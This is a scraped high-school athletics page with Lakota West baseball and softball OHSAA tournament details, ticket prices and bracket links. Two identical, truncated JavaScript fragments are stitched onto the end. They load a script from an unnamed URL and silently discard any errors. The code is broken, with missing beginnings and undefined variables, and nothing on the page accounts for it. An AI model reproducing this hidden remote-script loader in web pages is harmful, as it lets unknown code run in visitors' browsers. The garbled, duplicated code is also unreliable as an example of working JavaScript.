Athletes of the Week
Lakota West Baseball & Softball OHSAA Tourney Info
OHSAA Tourney Info:
Baseball
Tourney Game: Lakota West vs. Lasalle (Season Over)
Tickets: Tickets are $10 and can be purchased online at www.ohsaa.org
NO PASSES/GMC SPORTS PASSES OR SENIOR CITIZEN DISCOUNTS WILL BE ACCEPTED! This an OHSAA hosted tournament event.
Link to OHSAA Brackets (Lakota West is in the Southwest 2 – Sectional/District)
Softball
Tourney Game: LAKOTA WEST vs. Massillon Perry (Season Over)
Tickets: Tickets are $10 and can be purchased online at www.ohsaa.org
NO PASSES/GMC SPORTS PASSES OR SENIOR CITIZEN DISCOUNTS WILL BE ACCEPTED! This an OHSAA hosted tournament event.
Link to OHSAA Brackets (2021 OHSAA Softball Statewide Tournament Brackets)
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();